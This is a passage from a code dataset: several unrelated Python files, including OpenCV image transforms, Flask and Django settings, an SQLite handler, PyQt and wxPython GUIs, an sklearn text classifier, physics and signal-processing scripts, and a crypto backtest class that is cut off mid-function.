cv2.warpAffine(I,M,(bound_w,bound_h))\n\nJ1=cropBorders(J1)\ncv2.imshow(\"License Plate Rotated\", J1)\n\n\ntform=np.float32([ [1,0.3,0],[0,1,0]])\n \n\nh,w=J1.shape[:2] #height and width values of the image\nJ2=np.zeros([h*2,w*2],dtype=np.uint8)\n\nJ2 = cv2.warpAffine(J1,tform,(w*2,h*2))\n\nJ2=cropBorders(J2)\ncv2.imshow(\"License Plate Skewed\", J2)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n#**************cleaner and color version\n\nI=cv2.imread(\"LicensePlate.png\") #read image\ncv2.imshow(\"License Plate Original\", I)\n\nheight,width=I.shape[:2]\n\n# Rotate clockwise 15 degrees to align base\nM= cv2.getRotationMatrix2D((width/2,height/2),-15,1)\nJ1 = cv2.warpAffine(I,M,(width,height))\ncv2.imshow(\"License Plate Rotated\", J1)\n\n\n# Now apply a skew\ntform=np.float32([ [1,0.3,0],[0,1,0]])\nheight,width=J1.shape[:2] \nJ2=np.zeros([h,w],dtype=np.uint8)\nJ2 = cv2.warpAffine(J1,tform,(width,height))\ncv2.imshow(\"License Plate Skewed\", J2)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"Week 3/Page_17_Example.py","file_name":"Page_17_Example.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532716982","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\ndb_path = os.path.join(basedir, '../db/dev_item_catelog.db')\n\nDEBUG = True\nPORT = 5000\nHOST = \"0.0.0.0\"\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + db_path\nSECRET_KEY = b'ce9679a787b3486299963861eff5738a'\n","sub_path":"config/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"138969446","text":"\n\"\"\"\nAuthor: Ryan Wilson\n\nNote: This is one of the most hacky, unorganized things I have ever written. This should only be temporary\n\n\"\"\"\nimport sqlite3 as sq\nimport sys\n\nclass handler():\n\n\t__slots__ = ( 'filename', 'contents', 'db', 'analysed', 'bad', 'preconditions' )\n\n\tdef __init__( self, filename=False ):\n\t\t\n\t\tif not filename:\n\t\t\tpass\n\t\telse:\n\t\t\tself.filename = filename\n\t\t\tself.parseFile( filename )\n\n\t\tself.db = sq.connect(\"analysis.db\")\n\t\tcursor = self.db.cursor()\n\n\n\tdef parseFile( self, filename ):\n\t\tfContents = \"\"\n\t\ttestData = {}\n\n\t\tfor line in open(filename):\n\t\t\tfContents += line\t\t\n\n\t\tcontent = fContents.split(\"SECTION=\")[1:]\n\n\t\td = dict()\n\n\t\tfor section in content:\n\t\t\ts = section.split(\"\\n\")\n\t\t\td[s[0]] = s[1:]\n\n\t\tself.contents = d\n\n\t\treturn self.contents\n\n\tdef handle( self ):\n\t\t\"\"\"\n\t\tDoes the job\n\n\t\tNeeds an if now\n\t\tHas to check if analysed first\n\t\t\"\"\"\n\t\ts = self.contents # redeclaration for typing's sake\n\n\t\t# Debugging\n\t\t# f = open('hi.txt', 'w+')\n\t\t# print(self.contents, file=f)\n\t\tanalysed = ''.join([x for x in s['analysed'] if x != ''])\n\n\t\tname = ','.join([x for x in s['segment_name'] if x != ''])\n\t\tfname = ','.join([x for x in s['file_name'] if x != ''])\n\t\tcode = ','.join([x for x in s['segment_code'] if x != ''])\n\t\txml = ','.join([x for x in s['xml'] if x != ''])\n\t\tblock = ','.join([x for x in s['block'] if x != ''])\n\t\terror = ','.join([x for x in s['error'] if x != ''])\n\t\tpreconditions = ','.join([x.replace('[1]', '', 1).replace('\"', '') for x in s['comparison'] if x != ''])\n\t\ttime = ','.join([x for x in s['time'] if x != ''])\n\t\ttestingtime = ','.join([x for x in s['testingTime'] if x != ''])\n\t\tgeneratetime = ','.join([x for x in s['generateTime'] if x != ''])\n\t\tlinecover = ','.join([x for x in s['lineCoverage'] if x != ''])\n\t\tbranchcover = ','.join([x for x in s['branchCoverage'] if x != ''])\n\n\n\t\tif analysed == 'true':\n\t\t\tsimple = ','.join([x for x in s['simple'] if x != ''])\n\t\t\ttran = \"\" # transformed section is empty for invariants\n\t\t\tbinary = \"\" # Binary section is empty for invariants?\n\t\t\tseg = ','.join([x for x in s['segmented'] if x != ''])\n\t\t\tbad = ','.join([x for x in s['bad'] if x != ''])\n\t\telse:\n\t\t\tsimple = 'N/A'\n\t\t\tself.contents['simple'] = ['N/A']\n\t\t\ttran = 'N/A'\n\t\t\tself.contents['transformed'] = ['N/A']\n\t\t\tbinary = 'N/A'\n\t\t\tself.contents['binary'] = ['N/A']\n\t\t\tseg = 'N/A'\n\t\t\tself.contents['segmented'] = ['N/A']\n\t\t\tbad = 'N/A'\n\t\t\tself.contents['bad'] = ['N/A']\n\n\t\tself.write(name, fname, simple, tran, binary, seg, bad, code, analysed, error, time, xml, block, \\\n\t\t\t\t preconditions, generatetime, testingtime, linecover, branchcover)\n\n\t\tself.analysed = analysed\n\t\tself.bad = bad\n\n\t\treturn s\n\n\tdef write( self, name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, \\\n\t\t\t time, xml, block, preconditions, generatetime, testingtime, linecover, branchcover ):\n\t\t\"\"\"\n\t\tWrites the stuff to the database\n\n\t\tAdd new things\n\t\t\"\"\"\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"CREATE TABLE IF NOT EXISTS linearAnalysis(name text, fname text, simple text, transformed text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t binary text, segmented text, bad text, code text, analysed text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t error text, time text, xml text, block text, preconditions text, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t generatetime text, testingtime text, linecover text, branchcover text \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t );\")\n\t\tself.db.commit()\n\t\tquery = \"INSERT INTO linearAnalysis (name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, time, \\\n\t\t\t\t\t\t\t\t\t\t\t xml, block, preconditions, generatetime, testingtime, linecover, branchcover \\\n\t\t\t\t\t\t\t\t\t\t\t ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\" \n\t\tcursor.execute(query, [name, fname, simple, transformed, binary, segmented, bad, code, analysed, error, time, xml, block, \\\n\t\t\t\t\t\t\t preconditions, generatetime, testingtime, linecover, branchcover])\n\t\tself.db.commit()\n\t\tID = cursor.lastrowid\n\t\tcursor.close()\n\n\t\treturn ID\n\n\tdef hasResult( self ):\n\t\t\"\"\"\n\t\tReturns whether or not the analysis was able to do anything of VALUE\n\t\t\"\"\"\n\t\tsomething = True \n\n\t\tif self.analysed != 'true' or self.bad != 'N/A': # Could probably be improved\n\t\t\tsomething = False\n\n\t\treturn something\n\n\nif __name__ == \"__main__\":\n\t\n\toutput = sys.argv[1] # I think this index is correct, should be filepath to analysis results\n\t\n\th = handler(output)\n\th.handle()\n\n\tif h.hasResult():\n\t\tprint('\\n\\nAnalysis produced some result.\\n\\n') # empty lines are for visibility during execution\n\telse:\n\t\tprint(\"\")","sub_path":"src/edu/rit/bsg/helium/analysis/rypython/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"213648686","text":"from __future__ import with_statement\n\nimport os\nimport sys\nimport operator\nimport time\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import Qt\n\nimport mosaic.mdio.sqlite3MDIO as sqlite\nfrom mosaic.utilities.resource_path import resource_path, last_file_in_directory\nimport mosaicgui.sqlQueryWorker as sqlworker\n\nclass FileViewWindow(QtGui.QDialog):\n\tdef __init__(self, parent = None):\n\t\tsuper(FileViewWindow, self).__init__(parent)\n\n\t\t# uic.loadUi(os.path.join(os.path.dirname(os.path.abspath(__file__)),\"statisticsview.ui\"), self)\n\t\tuic.loadUi(resource_path(\"fileview.ui\"), self)\n\t\t\n\t\tself._positionWindow()\n\n\t\tself.idleTimer=QtCore.QTimer()\n\t\tself.idleTimer.start(3000)\n\t\n\t\tself.queryString=\"select filename, fileformat, modifiedtime from processedfiles\"\n\t\tself.queryData=[]\n\n\t\tself.tableModel = FileViewModel(self, [['N/A','N/A','N/A']], ['File Name', 'File Type', 'Last Modified'])\n\t\tself.fileTableView.setModel(self.tableModel)\n\n\t\tself.qWorker=None\n\t\tself.qThread=QtCore.QThread()\n\n\tdef openDB(self, dbpath):\n\t\t\"\"\"\n\t\t\tOpen the latest sqlite file in a directory\n\t\t\"\"\"\n\t\tself.openDBFile( last_file_in_directory(dbpath, \"*sqlite\") )\n\n\tdef openDBFile(self, dbfile):\n\t\t\"\"\"\n\t\t\tOpen a specific database file.\n\t\t\"\"\"\n\t\tself.qWorker=sqlworker.sqlQueryWorker(dbfile)\n\t\n\t\t# Connect signals and slots\n\t\tself.qWorker.resultsReady.connect(self.OnDataReady)\n\n\t\tself.qWorker.moveToThread(self.qThread)\t\n\t\tself.qWorker.finished.connect(self.qThread.quit)\n\t\tself.qThread.start()\n\n\t\t# Query the DB\n\t\tself._updatequery()\n\n\t\t# Idle processing\n\t\tQtCore.QObject.connect(self.idleTimer, QtCore.SIGNAL('timeout()'), self.OnAppIdle)\n\n\tdef closeDB(self):\n\t\tpass\n\n\tdef _positionWindow(self):\n\t\t\"\"\"\n\t\t\tPosition settings window at the top left corner\n\t\t\"\"\"\n\t\tif sys.platform=='win32':\n\t\t\tself.setGeometry(405, 555, 640, 200)\n\t\telse:\n\t\t\tself.setGeometry(405, 585, 640, 200)\n\n\tdef _updatequery(self):\n\t\tself.qThread.start()\n\t\tQtCore.QMetaObject.invokeMethod(self.qWorker, 'executeSQL', Qt.QueuedConnection, QtCore.Q_ARG(str, self.queryString) )\n\t\tself.queryRunning=True\n\n\tdef OnDataReady(self, res, errorstr):\n\t\tif not errorstr:\n\t\t\ttry:\n\t\t\t\tif len(res) > 0:\n\t\t\t\t\tself.queryData=[ [os.path.basename(r[0]), r[1], time.ctime(float(r[2])) ] for r in res]\n\n\t\t\t\t\t# self.tableModel = FileViewModel(self, self.queryData, ['File Name', 'File Type', 'Last Modified'])\n\t\t\t\t\tself.tableModel.update(self.queryData)\n\t\t\t\t\t# self.fileTableView.setModel(self.tableModel)\n\n\t\t\t\t\tself.fileTableView.resizeColumnsToContents()\n\t\t\texcept:\n\t\t\t\traise\n\t\t\t\t\n\t\tself.queryRunning=False\n\n\tdef OnAppIdle(self):\n\t\tif not self.queryRunning:\n\t\t\tself._updatequery()\n\nclass FileViewModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, data, header, *args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, *args)\n\n\t\tself.data=data\n\t\tself.header=header\n\n\tdef rowCount(self, parent):\n\t\treturn len(self.data)\n\n\tdef columnCount(self, parent):\n\t\treturn len(self.data[0])\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\treturn self.data[index.row()][index.column()]\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\treturn self.header[col]\n\n\t\treturn None\n\n\tdef sort(self, col, order):\n\t\tself.emit(QtCore.SIGNAL(\"layoutAboutToBeChanged()\"))\n\t\tself.data = sorted(self.data, key=operator.itemgetter(col))\n\n\t\tif order == QtCore.Qt.DescendingOrder:\n\t\t\tself.data.reverse()\n\t\t\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\n\tdef update(self, data):\n\t\tself.data=data\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nif __name__ == '__main__':\n\tdbfile=resource_path('eventMD-PEG29-Reference.sqlite')\n\n\tapp = QtGui.QApplication(sys.argv)\n\tdmw = FileViewWindow()\n\tdmw.openDBFile(dbfile)\n\tdmw.show()\n\tdmw.raise_()\n\tsys.exit(app.exec_())\n\n","sub_path":"mosaicgui/fileview/fileview.py","file_name":"fileview.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455880646","text":"import Vector\nimport PrincipleStress\nimport Stress\nimport wx\n\n# Example for stress input format: -19,-4.7,6.45/-4.7,4.6,11.8/6.45,11.8,-8.3\n# Example for vector input format: 1,4,2\n\n# List of the possible choices\nchoices = ['Vector Transformation', 'Stress Transformation', 'Principle Stress']\n\n\n# Function to show dialog with selectable items\ndef choose(title='AEE 361 Project', label='Choose which transformation to make'):\n modal = wx.SingleChoiceDialog(None, label, title, choices)\n\n if modal.ShowModal() == wx.ID_OK:\n result = modal.GetStringSelection()\n else:\n result = \"cancelled\"\n modal.Destroy()\n return result\n\n\n# Initialize the dialog interface\napp = wx.App()\napp.MainLoop()\n\n# show the choices dialog\nchoice = choose()\n\n# release the interface\napp.ExitMainLoop()\n\n# check for the choice\nif choice == choices[0]:\n Vector.vector_main_()\nelif choice == choices[1]:\n Stress.stress_main_()\nelif choice == choices[2]:\n PrincipleStress.principle_stress_main()\n","sub_path":"ProjectMain.py","file_name":"ProjectMain.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235406615","text":"# import libraries\nimport sys\nimport numpy as np\nimport pandas as pd\n\nimport nltk\n\nnltk.download([\"punkt\", \"wordnet\", \"averaged_perceptron_tagger\"])\n\n\nfrom sqlalchemy import create_engine\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport re\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import classification_report\nimport pickle\n\n\ndef load_data(database_filepath):\n \"\"\" load data from database and define feature and target variables X and Y\"\"\"\n\n # create engine to get connection\n engine = create_engine(\"sqlite:///{}\".format(database_filepath))\n with engine.connect() as connection:\n df = pd.read_sql_table(\"appen\", connection)\n # define the features and output of the model\n X = df[\"message\"]\n Y = df.drop([\"message\", \"id\", \"original\", \"genre\"], axis=1)\n category_names = list(Y.columns)\n\n return X, Y, category_names\n\n\n# Tokenize function\ndef tokenize(text):\n \"\"\"Perform tokenization and lemmatization on the input text.\n\n Args: \n \n text -> string\n\n Returns:\n\n Array of strings containing a tokenized and lemmatizated version of the input string without\n characters that are not alphanumeric.\n\n \"\"\"\n text = re.sub(r\"[^a-zA-Z0-9]+\", \" \", text.lower())\n\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef build_model():\n \"\"\" Build pipeline that transforms a count matrix to a normalized tf or tf-idf representation\n and use linearSVC to classify the input.\"\"\"\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"evaluates by precision, recall, f1-score using classification_report\"\"\"\n y_pred_grid = model.predict(X_test)\n print(\n classification_report(Y_test.values, y_pred_grid, target_names=category_names)\n )\n\n\ndef save_model(model, model_filepath):\n \"\"\" Export model as a pickle file\"\"\"\n pickle.dump(model, open(model_filepath, \"wb\"))\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print(\"Loading data...\\n DATABASE: {}\".format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print(\"Building model...\")\n model = build_model()\n\n print(\"Training model...\")\n model.fit(X_train, Y_train)\n\n print(\"Evaluating model...\")\n evaluate_model(model, X_test, Y_test, category_names)\n\n print(\"Saving model...\\n MODEL: {}\".format(model_filepath))\n save_model(model, model_filepath)\n\n print(\"Trained model saved!\")\n\n else:\n print(\n \"Please provide the filepath of the disaster messages database \"\n \"as the first argument and the filepath of the pickle file to \"\n \"save the model to as the second argument. \\n\\nExample: python \"\n \"train_classifier.py ../data/DisasterResponse.db classifier.pkl\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573477838","text":"#!/usr/bin/env python\n\n'''\ncce analysis module\n'''\n\n__author__ = \"YANG TAO \"\n__copyright__ = \"Copyright (c) yangtao\"\n__created__ = \"[2018-03-09 Fri 19:00]\"\n\nimport sys,os,re\nimport numpy as np\nimport ROOT\nimport logging\n\nclass cceanalysis():\n\n def __init__(self):\n self.emit_particle_energy =5.89 #keV\n self.emit_particle_number = 10000\n self.mean_ionization_energy = 3.6 #ev\n self.gain = 8\n self.adc_threshold = 0.\n self.adc_slope = 3.8\n self.max_cluster_size = 4\n\n self.fname = None\n self.logname = None\n self.logger = None\n self.practical_adc_deposition = None\n self.receive_particle_number = None\n self.cce = None\n\n def __del__(self):\n pass\n\n def calculate_cce(self,receive_particle_number,practical_adc_deposition):\n ideal_adc_deposition = (receive_particle_number*self.gain*self.emit_particle_energy*1000/self.mean_ionization_energy)/self.adc_slope\n cce = practical_adc_deposition/ideal_adc_deposition\n return cce,ideal_adc_deposition\n\n def get_logger(self):\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(self.fname)\n self.file_handler = logging.FileHandler('./ccelog/'+self.logname+'_cce.log')\n self.file_handler.setLevel(logging.DEBUG)\n self.file_handler.setFormatter(logging.Formatter(' %(asctime)s - %(levelname)s- %(message)s'))\n logger.addHandler(self.file_handler)\n return logger\n\n\n\n def loginfo(self,logger):\n logger.info(' file name = %s'%self.fname)\n logger.info(' emit particle energy = %.2f keV'%self.emit_particle_energy)\n logger.info(' mean ionization energy = %s eV'%str(self.mean_ionization_energy))\n logger.info(' gain = %s'%str(self.gain))\n logger.info(' adc threshold = %s'%str(self.adc_threshold))\n logger.info(' adc slope = %s'%str(self.adc_slope)+ 'e')\n logger.info(' emit particle number = %s'%str(self.emit_particle_number))\n logger.info(' receive particle number = %s'%str(self.receive_particle_number[0]))\n logger.info(' ideal adc deposition = %s'%str(int(self.ideal_adc_deposition[0])))\n logger.info(' practical adc deposition = %s'%str(self.practical_adc_deposition[0]))\n logger.info(' charge collection efficiency = %.2f\\n'%self.cce[0])\n\n for icluster in xrange(1,self.max_cluster_size+1):\n logger.info(' cluster%d receive particle number = %s'%(icluster,str(self.receive_particle_number[icluster])))\n logger.info(' cluster%d ideal adc deposition = %s'%(icluster,str(int(self.ideal_adc_deposition[icluster]))))\n logger.info(' cluster%d practical adc deposition = %s'%(icluster,str(self.practical_adc_deposition[icluster])))\n logger.info(' cluster%d charge collection efficiency = %.2f\\n'%(icluster,self.cce[icluster]))\n\n logger.removeHandler(self.file_handler)\n\n\n def analyze(self,fname):\n\n self.fname = fname\n\n if not os.path.exists('./ccelog/'):\n os.makedirs('./ccelog/')\n logregex = re.compile('(./output/)(.*)(.root)')\n logmo = logregex.match(self.fname)\n self.logname = logmo.group(2)\n self.logger = self.get_logger()\n\n self.practical_adc_deposition = np.zeros(self.max_cluster_size+1)\n self.receive_particle_number = np.zeros(self.max_cluster_size+1,dtype=int)\n\n try:\n f = ROOT.TFile(self.fname)\n t = f.Get('clusters')\n entries = t.GetEntries()\n except:\n logger.error(self.fname+' is invalid!')\n sys.exit()\n\n for ientry in xrange(entries):\n t.GetEntry(ientry)\n size = t.size\n adc = 0\n\n if size <= self.max_cluster_size:\n for ipos in xrange(size):\n adc += t.signal.at(ipos) \n if adc>self.adc_threshold:\n self.receive_particle_number[0] += 1\n self.receive_particle_number[size] += 1\n self.practical_adc_deposition[0] += adc\n self.practical_adc_deposition[size] +=adc\n\n else:\n continue\n\n self.cce,self.ideal_adc_deposition = self.calculate_cce(self.receive_particle_number,self.practical_adc_deposition)\n\n print('\\n********************%s*********************\\n'%self.fname)\n\n self.loginfo(self.logger)\n\n return self.cce,self.receive_particle_number\n\n\nif __name__ == '__main__':\n e = cceanalysis()\n e.analyze('./output/data_with_electricfield_genapx.root')\n e.analyze('./output/data_without_electricfield_genapx.root')","sub_path":"jadepix1/python/cceanalysis.py","file_name":"cceanalysis.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633512626","text":"# Django settings for autodata project.\n\nDEBUG = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n}\n\nMIDDLEWARE = (\n 'httpxforwardedfor.middleware.HttpXForwardedForMiddleware',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'mq%31q+sjj^)m^tvy(klwqw6ksv7du2yzdf9yn78iga*r%8w^t-httpxforwardedfor'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'httpxforwardedfor',\n 'testapp',\n)\n\nSTATIC_URL = '/static/'\n\n# Only allow HTTP_X_FORWARDED_FOR, if the request is marked as secure.\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# To only allow change of the REMOTE_ADDR for requests via HTTPS.\n# The default is to allow all requests.\nTRUST_ONLY_HTTPS_PROXY = True\n\nROOT_URLCONF = \"tests.testapp.urls\"\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455437937","text":"import os\n\nimport numpy as np\n\n\ndef spotted_lc():\n \"\"\"\n Returns\n -------\n data: ndarray\n KIC 9655172 light curve, used for testing and demonstration.\n\n Examples\n --------\n >>> import periodicity.data\n >>> t, y, dy = periodicity.data.spotted_lc()\n >>> y.shape == (2148,)\n True\n \"\"\"\n filename = os.path.join(os.path.dirname(__file__), \"spotted_lc.npy\")\n data = np.load(filename)\n return data\n\n\ndef bpsk(t_bit, n_bits, f_c, n0_db=-np.inf):\n \"\"\"\n Parameters\n ----------\n t_bit: int\n Number of samples per bit (sampling rate / bit rate).\n n_bits: int\n Desired number of bits in the generated signal.\n f_c: scalar\n Carrier frequency (normalized units).\n n0_db: scalar, optional\n Noise spectral density (average noise power). Defaults to -inf (zero noise).\n\n Returns\n -------\n data: ndarray\n Noisy BPSK signal, used for testing and demonstration.\n\n Examples\n --------\n >>> import periodicity.data\n >>> t, y = periodicity.data.bpsk(t_bit=10, n_bits=4000, f_c=0.05)\n >>> y.shape == (40_000,)\n True\n \"\"\"\n t0 = t_bit * n_bits\n sym_seq = np.zeros(t0)\n sym_seq[::t_bit] = np.random.choice([-1, 1], n_bits)\n pulse = np.ones(t_bit)\n baseband = np.convolve(pulse, sym_seq)[:t0]\n signal = baseband * np.exp(1j * 2 * np.pi * f_c * np.arange(t0))\n noise = np.random.randn(t0) + 1j * np.random.randn(t0)\n n0 = 10 ** (n0_db / 10)\n noise *= np.sqrt(n0 / np.var(noise))\n data = signal + noise\n return data\n","sub_path":"periodicity/data/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"360010785","text":"\"\"\"\nAuthor: Ziwei JIANG\nDate:2016/9/1\nVersion:1.0\nDiscription:\n\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nplt.rcdefaults()\nimport numpy as np\nfrom matplotlib.pyplot import savefig\n\ndef box_flier(data, parameters, output):\n\n # data\n all_data=[]\n pos=[]\n with open(data) as f:\n f_csv=csv.reader(f)\n header=next(f_csv)\n count=len(header)\n pos=header[1:]\n for row in f_csv:\n all_data.append(map(float,row[1:count]))\n all_data=map(list,zip(*all_data))\n\n # parameters\n figsize=(8,5)\n param=\" \"\n boxprops=dict(linestyle='--',linewidth='2',color='black')\n flierprops = dict(marker='o', markerfacecolor='green', markersize=12,linestyle='None',markeredgecolor='c')\n\n if 'figsize' in parameters.keys():\n figsize = eval(parameters['figsize'])\n fig = plt.figure(facecolor='w', figsize=figsize)\n if 'xlabel' in parameters.keys():\n plt.xlabel(parameters['xlabel'])\n if 'title' in parameters.keys():\n plt.title(parameters['title'])\n if 'ylabel' in parameters.keys():\n plt.ylabel(parameters['ylabel'])\n if 'whis' in parameters.keys():\n param=param+',whis='+str(parameters['whis'])\n if 'widths' in parameters.keys():\n param=param+',widths='+str(parameters['widths'])\n if 'showmeans' in parameters.keys():\n param=param+',showmeans='+str(parameters['showmeans'])\n if 'showcaps' in parameters.keys():\n param=param+',showcaps='+str(parameters['showcaps'])\n if 'vert' in parameters.keys():\n param=param+',vert='+str(parameters['vert'])\n if 'flier_marker' in parameters.keys():\n flierprops['marker']=parameters['flier_marker']\n if 'flier_markerfacecolor' in parameters.keys():\n flierprops['markerfacecolor']=parameters['flier_markerfacecolor']\n if 'flier_markeredgecolor' in parameters.keys():\n flierprops['markeredgecolor']=parameters['flier_markeredgecolor']\n if 'flier_markersize' in parameters.keys():\n flierprops['markersize']=parameters['flier_markersize']\n if 'flier_linestyle' in parameters.keys():\n flierprops['linestyle']=parameters['flier_linestyle']\n if 'box_linestyle' in parameters.keys():\n boxprops['linestyle']=parameters['box_linestyle']\n if 'box_linewidth' in parameters.keys():\n boxprops['linewidth']=parameters['box_linewidth']\n if 'box_color' in parameters.keys():\n boxprops['color']=parameters['box_color']\n param=param+',flierprops='+str(flierprops)\n param=param+',boxprops='+str(boxprops)\n\n # plot violin plot\n exec(\"bplot=plt.boxplot(all_data,showfliers='True'\"+param+\")\")\n # adding horizontal grid lines\n plt.grid(True,linestyle='--',linewidth=0.5)\n\n # add x-tick labels\n plt.xticks(np.arange(len(all_data))+1,pos)\n\n savefig(output,format='svg')\n","sub_path":"charts/python/matplotlib/box_flier.py","file_name":"box_flier.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488675988","text":"# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n# -*- coding:utf-8 -*-\n__author__ = 'xin'\n\n\"\"\"\n此文件是创建虚拟账户 \n\"\"\"\nfrom Data.dataMain_Fund_version import HistoryData\nimport talib\nimport numpy as np\nfrom collections import OrderedDict\nimport datetime\nfrom Strategy.strategy1_Fund_version_v2 import Demo\nimport copy\nfrom Setting.setting import start_date, end_date, init_dict, symbol_history_list, STRATEGY_NAME\n\n\n\nclass Order(object):\n def __init__(self, symbol, amount, time=None, type='market', price=0.):\n self.order_time = '' # 指令下达时间 datetime\n self.symbol = symbol # 交易标的\n self.type = type # 下单类型\n self.price = price # 价格\n self.amount = amount # 指令交易数量\n\n pass\n\n\nclass Account(object):\n # 初始化设置\n def __init__(self, init_dict, ):\n self.init_dict = init_dict\n self.symbol = ['BTC/USDT'] # symbol list\n self.cash = init_dict # 初始金额\n self.balance = init_dict # 账户余额\n self.free_cash = init_dict # 可使用资金\n self.free_cash_list = []\n self.used_cash = {} # 已用资金 使用的保证金\n self.used_cash_list = []\n self.allowClose_symbol = {} # 可卖标的\n self.trade_date = [] # 交易日日期\n self.back_test_date = [] # 回测日期\n self.every_balance = [] # 每日净值\n self.openFlag = True # 是否可以开仓标记\n self.closeFlag = False # 是否可以平仓\n self.limit_openFlag = True\n self.limit_closeFlag = False\n self.Order = Order # 下单模块\n self.blotter = [] # 下单列表\n\n self.open_fee = 0.001 # 开仓手续费\n self.close_fee = 0.001 # 平仓手续费\n\n self.csv_time_list = []\n self.csv_balance_list = []\n self.csv_openPrice_dict = OrderedDict() # 记录建仓价格\n self.csv_closePrice_dict = OrderedDict() # 记录平仓价格\n self.csv_dataPrice_dict = OrderedDict() # 记录货币价格\n\n for i in init_dict:\n self.used_cash[i] = 0.0 # 初始化\n\n\n pass\n\n def get_history(self, symbol, start, end, freq):\n \"\"\"\n 获取历史数据\n :param symbol: 交易标的\n :param start: 起始时间\n :param end: 结束时间\n :param freq: 时间周期\n :return: { symbol : {closePrice:[ , , ,],\n openPrice:[ , , ,],\n highPrice:[ , , ,],\n }\n \"\"\"\n return HistoryData().get_history_data()\n\n # 处理数据\n def handle_data(self, data_dict=None, today=None, price_type=None):\n # data = [float(x) for x in range(20)]\n # 获取时间长度搓 取数据字典中 第一个key 作为 后边遍历的标准\n data = data_dict[list(data_dict.keys())[0]]\n\n print('处理数据为:', data.columns[-1])\n real_data = data\n data = data[data.columns[-1]]\n\n # 创建策略实例\n demo = Demo()\n\n # a = talib.MA(np.array(data), timeperiod=10)\n for i in range(len(data)):\n # print('data[i], a[i]', data[i], a[i])\n today = real_data.index[i]\n try:\n price = data[i + 1]\n except:\n price = np.nan\n\n info_d = {}\n 